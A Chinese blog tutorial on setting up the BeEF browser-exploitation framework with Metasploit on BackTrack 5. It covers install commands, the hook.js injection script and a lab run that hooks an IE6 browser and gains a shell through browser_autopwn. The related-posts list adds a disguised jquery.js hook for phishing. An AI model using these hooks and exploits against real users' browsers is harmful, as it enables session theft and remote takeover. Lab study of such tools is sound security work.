初探BeEF

最新推荐文章于 2023-06-01 14:53:33 发布
最新推荐文章于 2023-06-01 14:53:33 发布
阅读量597 收藏
点赞数
分类专栏: 安全

完了XSS的一个测试关卡

听蓝蓝大神说有个XSS神器叫Beef

他还写了个win下的搭建使用教程

那我就写个BT5r3下的教程

仅供自己翻阅方便,版权意识基本没有

=============================================================================

1.什么是BeEF?


就是 The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。

里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持Java,vb,flash等,所以说XSS神器嘛。。

大概长这个样子(默认用户名密码是beef,beef):



2.安装beef和使用beef


BT5r3 已经是自带了ruby和beef了,我们不用下载和安装了。

[plain]  view plain  copy
  1. ruby :ruby 1.9.2dev (2010-07-02) [i486-linux]  
  2. beef :Version 0.4.3.6-alpha  

beef默认安装在:/pentest/web/beef/ 下

metasploit默认安装在:/opt/metasploit/下

翻看了下beef的安装文档:INSTALL.txt

[plain]  view plain  copy
  1. 1. Prerequisites (platform independent)  
  2.   
  3.      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:  
  4.   
  5.      gem install bundler  
  6.   
  7. . Prerequisites (Linux)  
  8.   
  9.      !!! This must be done PRIOR to running the bundle install command !!!  
  10.        
  11.      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:  
  12.   
  13.      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc  
  14.      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required  
  15.      3.2. rvm install 1.9.2  
  16.      3.3. rvm use 1.9.2  
发现有个东西必须的安装: bundler! (千古一问:为什么BT5不一起把bundler安装好呢?)

总结了下就是:

[plain]  view plain  copy
  1. apt-get install libsqlite3-dev sqlite3 sqlite3-doc   
  2. gem install bundler  
  3. bundle install  
如果出错(因为环境变量的问题,我感觉看官们一定会出错的,乖乖输入下面的命令):

[plain]  view plain  copy
  1. gem install --user-install bundler   
然后开启beef:./beef

出现如下信息则成功:

[plain]  view plain  copy
  1. root@bt:/pentest/web/beef# ./beef   
  2. [ 9:17:50][*] Browser Exploitation Framework (BeEF)  
  3. [ 9:17:50]    |   Version 0.4.3.6-alpha  
  4. [ 9:17:50]    |   Website http://beefproject.com  
  5. [ 9:17:50]    |   Run 'beef -h' for basic help.  
  6. [ 9:17:50]    |_  Run 'git pull' to update to the latest revision.  
  7. [ 9:17:50][*] Successful connection with Metasploit.  
  8. [ 9:17:53][*] Loaded 203 Metasploit exploits.  
  9. [ 9:17:53][*] BeEF is loading. Wait a few seconds...  
  10. [ 9:17:57][*] 9 extensions loaded:  
  11. [ 9:17:57]    |   Console  
  12. [ 9:17:57]    |   Requester  
  13. [ 9:17:57]    |   Events  
  14. [ 9:17:57]    |   Proxy  
  15. [ 9:17:57]    |   XSSRays  
  16. [ 9:17:57]    |   Autoloader  
  17. [ 9:17:57]    |   Metasploit  
  18. [ 9:17:57]    |   Demos  
  19. [ 9:17:57]    |_  Admin UI  
  20. [ 9:17:57][*] 316 modules enabled.  
  21. [ 9:17:57][*] 2 network interfaces were detected.  
  22. [ 9:17:57][+] running on network interface: 127.0.0.1  
  23. [ 9:17:57]    |   Hook URL: http://127.0.0.1:3000/hook.js  
  24. [ 9:17:57]    |_  UI URL:   http://127.0.0.1:3000/ui/panel  
  25. [ 9:17:57][+] running on network interface: 192.168.198.128  
  26. [ 9:17:57]    |   Hook URL: http://192.168.198.128:3000/hook.js  
  27. [ 9:17:57]    |_  UI URL:   http://192.168.198.128:3000/ui/panel  
  28. [ 9:17:57][*] RESTful API key: c29aef201f68aee70afc6ffedea1f77e8304ce72  
  29. [ 9:17:57][*] HTTP Proxy: http://127.0.0.1:6789  
  30. [ 9:17:57][*] BeEF server started (press control+c to stop)  

其实BeEF能干很多事,比如说,控制被HOOK浏览器弹个框吧:



3.配置beef携手Metasploit


首先关闭beef(Ctrl+C)。

在/opt/metasploit/文件夹下gedit beef.rc,写入内容:

[plain]  view plain  copy
  1. load msgrpc ServerHost=127.0.0.1 Pass=abc123  
这里上网搜了下,发现密码神马的最好不要改,那就不改啦~

安装msgpack:

[plain]  view plain  copy
  1. gem install --user-install msgpack  
修改配置让beef支持metasploit:

[plain]  view plain  copy
  1. gedit /pentest/web/beef/config.yaml  
  2. 把        metasploit:  
  3.            enable: false  
  4. 改成:  
  5.            metasploit:  
  6.            enable: true  

Ps:这里必须先开msf,再开beef,才能在beef下用msf,也就是说两者开着一起工作!

我们启动metasploit:

[plain]  view plain  copy
  1. root@bt:/opt/metasploit/msf3# msfconsole -r beef.rc   

出现如下信息就表示成功:

[plain]  view plain  copy
  1. [*] Processing beef.rc for ERB directives.  
  2. resource (beef.rc)> load msgrpc ServerHost=127.0.0.1 Pass=abc123  
  3. [*] MSGRPC Service:  127.0.0.1:55552   
  4. [*] MSGRPC Username: msf  
  5. [*] MSGRPC Password: abc123  
  6. [*] Successfully loaded plugin: msgrpc  

然后我们再启动beef:

[plain]  view plain  copy
  1. root@bt:/pentest/web/beef# ./beef   


beef,beef登陆后我们就能看到一个可爱的界面了:



然后BeEF自带了一个hack页面,坐等别人上钩:

[plain]  view plain  copy
  1. http://127.0.0.1:3000/demos/basic.html   

里面主要是有这么一段js代码:

[plain]  view plain  copy
  1. <script>  
  2.     var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';  
  3.     document.write(commandModuleStr);  
  4. </script>  
只要有人访问了这个站点,就会上钩,然后加入到beef左侧。。


4.对XPSP1测试


(1)让xp sp1 用IE6访问hack页面:

[plain]  view plain  copy
  1. http://192.168.198.128:3000/demos/basic.html   

发现面板左侧上多了一个目标,也就是我们喜欢的IE6:



(2)

拿msf生成HOOK链接:

[plain]  view plain  copy
  1. msf > use auxiliary/server/browser_autopwn   
  2. msf  auxiliary(browser_autopwn) > set LHOST 192.168.198.128 #我服务器自己的地址  
  3. LHOST => 192.168.198.128  
  4. msf  auxiliary(browser_autopwn) > run  
然后出来一大堆URL,我们选择,IE的一个:

[plain]  view plain  copy
  1. http://192.168.198.128:8080/hxRmMPkYJa  
控制被HOOK的浏览器去访问这个链接:



然后msf 突然就开始自己(意味着自动化,这点以前一直以为我要做些什么,其实不用)跑起来,拿到shell:



至此,BeEF就算是一个初步认识和使用了。

有很多功能还没学会了,不过我感觉控制那个cookie之类的应该是没问题了。。

这么强大的神器,你还在等什么呢?



emaster  关注信息安全的胖子

欢迎转载,但转载请注明地址:http://blog.csdn.net/emaste_r/article/details/17091067

izj007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BeEf:利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2480
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安 BeEf ,需要我们自行安。 apt install beef-xss 安完成后,直接
beef-xss钓鱼
Williamanddog的博客
01-27 637
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安。_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。
kali linux小白学习(beef网络钓鱼攻击)
最新发布
Build20的博客
06-01 288
之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=打开var/www/html文件并查看里面的文件(linux目录下有个目录:/回到kali机,可以看到上钩了,我可以查看他的cookie了。之后进入靶机,把kali机的ip地址输入,可以看到上钩了。1.解析网页语言,如html,php,jsp等。
webwell安全工具-BeEF
凯歌响起的博客
09-05 1920
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。用Ruby语言开发的,Kali中默认安的一个模块,用于实现对XSS漏洞的攻击和利用。​ BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。
beef插件翻译.docx
12-09
Beef 插件翻译文档 Beef 插件是一个功能强大且广泛使用的渗透测试工具,它提供了多种模块来实现不同的攻击和信息收集任务。下面是 Beef 插件翻译文档中的知识点总结: 1. Module Tree(模块树): Module Tree 是...
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
Improbable_Beef
03-21
在IT行业中,"不可能的牛肉"(Improbable Beef)可能是一个项目或产品的名称,但因为没有具体的标签或额外信息,我们无法直接关联到特定的IT知识点。不过,我们可以从这个名称出发,探讨一些与软件开发、游戏设计、...
synthetic-beef
04-18
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
vasp.5.4.4&beef-src.tar.xz
03-20
VASP+BEEF beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT...
BeEF】Ubuntu 20.04安BeEF
白帽子续命指南
06-05 1790
先把老外的这个教程贴在这里,按着这个基本就可以操作了,如果对自己的技术不放心的,一定要看完,我后面会写我操作时遇到的问题! Installing BeEF on ubuntu 18.04 While working on a VM for a class, I had the opportunity to install BeEF for the students. This was the first VM I have built using Ubuntu 18.04, so I expected th
Python Ethical Hacking - BeEF Framework(1)
weixin_30858241的博客
09-14 415
Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets are hooked once they load Javascript code. Hook code can be placed in an HTML page and sha...
Beef与简单使用
abg49988的博客
11-06 2042
Debian / Ubuntu 安依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
BEEF的搭建与使用
热门推荐
王意林的专栏
07-17 1万+
与搭建 beef是ruby写的,在windows下安beef还是有些麻烦的,需要很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
浏览器攻击框架BeEF Part 3:持续控制
Fly_鹏程万里
08-22 1690
前言 前两章分别对BeEF框架做了初步介绍以及讲解了初始化控制。 前情提要:浏览器攻击框架BeEF Part 1,浏览器攻击框架BeEF Part 2:初始化控制 接下来就是介绍如何让BeEF持续控制僵尸们了。 持续化控制 BeEF在获得对僵尸们的初始化控制后,首要的任务是想办法持续化控制它们。这是因为初始化控制一般只是发生在单个或多个页面内(勾子一般只注入到一个页面或多个页面),一旦用...
beef结合msf钓鱼
weixin_34174132的博客
03-17 659
Kali linux 系统默认未安beef,需要自行安12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
Kali之Beef利用Xss进行钓鱼
My灬Futrue的博客
07-07 1760
1、操作准备 攻击机:Kali(ip地址:192.168.1.107) 受害者:Windows7 x64(ip地址:192.168.1.163) 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改 注:(默认beef用户名和密码位User:beef,Password:beef) 3、启动Beef root@kali:~# beef-xss
BeEF
MyDriverC
12-16 1477
一、BeEF简介   BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。   二、安BeEF   先下载Beef最新版本   $ svn checkout http://beef.googlecode.com/svn/track/ beef   $ ruby install
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值